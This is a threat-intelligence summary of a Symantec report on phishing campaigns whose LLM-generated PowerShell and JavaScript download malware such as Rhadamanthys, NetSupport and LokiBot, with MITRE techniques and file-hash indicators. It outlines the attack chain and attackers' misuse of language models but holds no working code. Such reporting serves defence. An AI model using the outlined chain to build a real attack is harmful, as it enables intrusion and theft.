Symantec reports AI-assisted attacks where Large Language Models generate code used to download payloads. Campaigns include Rhadamanthys, NetSupport, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and Dunihi (H-Worm). #Rhadamanthys #NetSupport #CleanUpLoader #Broomstick #Oyster #ModiLoader #DBatLoader #LokiBot #Dunihi #HWorm #Symantec
Keypoints
- Symantec observes a rise in campaigns that use Large Language Models to generate malware-delivery scripts and code.
- Phishing emails deliver password-protected ZIP attachments containing LNK files that trigger LL-generated PowerShell scripts.
- LLM-generated HTML/JavaScript code facilitates the initial access and payload delivery stages of campaigns.
- Final payloads include Rhadamanthys, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and NetSupport.
- The attack chain can progress from user interaction with malicious attachments to downloading and executing additional payloads via PowerShell/LLM-generated scripts.
- Symantec emphasizes AI’s dual potential: societal benefits and increased cybercriminal sophistication; they offer protections against these AI-driven threats.
MITRE Techniques
- [T1566] Phishing – Spearphishing emails are crafted to appear legitimate, often mimicking important notifications (e.g., HR notifications). “Initial access: User receives a human-crafted phishing email with an attachment, mimicking an HR notification.”
- [T1059.001] PowerShell – Execution of LLM-generated PowerShell scripts triggered by user interaction with malicious attachments. “Opening the malicious attachment executes an HTML file with embedded JavaScript that is highly likely generated by an LLM.”
- [T1059.007] JavaScript – LLM-generated HTML/JavaScript content facilitates payload delivery. “HTML file with embedded JavaScript that is highly likely generated by an LLM.”
- [T1105] Ingress Tool Transfer – The HTML/LLM-generated code is designed to download and execute additional payloads. “designed to download and execute additional payloads.”
- [T1203] User Execution – Users are tricked into executing malicious files (e.g., .lnk files) that lead to further payload downloads. “Initial access: User receives a human-crafted phishing email with an attachment, mimicking an HR notification.”
- [T1219] Remote Access Tools – Campaigns deliver NetSupport remote access Trojan among final payloads. “NetSupport remote access Trojan.”
Indicators of Compromise
- [PowerShell script] – 0A90FADE657A0C0AC73D4E085E168AA8515994700A12612D1C20CB00ED15A0CA, F5FC667D818A26FBB5C04657B131D86AF1746A349CEB9D6E441D24C8673393B2
- [LNK file] – 30DD8CBBA98F2E4CBB8D8D85A7A9AC97B0157A77C83D9B8DEAB50C2225C0CB22, 948D0D1FABBD858C13C387737EF833BEB982141CFC2E2D0E26024918EB0AF479
- [Rhadamanthys] – 121E900D1EFC6D9E537471360848B333BFBBB7E08ECADB1D75897882CE2DCB20, 29F8B50F737FEEF9EC7439780DAEAD395BF2BF278A4540DDFFE64CA70AA9F462
- [JavaScript] – 2AE6737D691BFF402FC50A29EDDCBE9FD0B0C18250776435F61CE70F3C9481CD, BC824A97E877EF38D5D14E0D51433F3890873B58B710C0E5D41A4638A1A3FAF4
- [HTML] – 9BD692BC32E13185232E95FF7693D0039B5C5C563323982BFAB34A5D1E0379AE, B1D48CA54EFB57B9BD626420391FBBC638C9F4271F009DFB31B28C33B76A4228
- [ZIP file] – 4153F2CE9CD956B29A1D1F21669932596FD1564863F65782D1EEA4E06E8623F7, 5077EEE9D9933E1DB4B311B893A8F3583CA9F0D9F6DB33938A67BF5054133AA8
- [Password-protected ZIP file] – 3A88FCB26F7A6BE68B65AB18D8358365E9A4FD7D4C0EF8FC581771CCFB746271, 44B3095A86F2091CCB9B52B9ECF995BC5B9E2294EB9E38D90E9FD743567F5F22
- [EXE file] – A2C1B716D20B61BC4C57748E1EC195FBAC2C5B143CF960D0FFEE895160D4B0DB, B6AADA8476838CD39EFD5A3681F50ECEB0938BBCDECD3712FDB81394ED2922BB
- [CleanUpLoader] – BB932056CAE8940742E50B4F2B994A802E703F7BC235E7DD647D085AE2B2BAF7, C398B3E06EF860670B9597DAED85632834FA961AEA87164B8BA8BB2F094A14EF
- [VBS] – BCDB4F1AF705889ACE73E8A0C8626BC6B615393A4C4F28EA00E5A51EB6E541D9, CD003F5CE0DDE74B9793685C549A6883B405FCA4D533F27FBB050199A2339A28
- [RAR file] – F06D83CE130BAE96EBFDE9ADDDD0FF1245FEBF768E6D984B69816B252808BA0C
Read more: https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm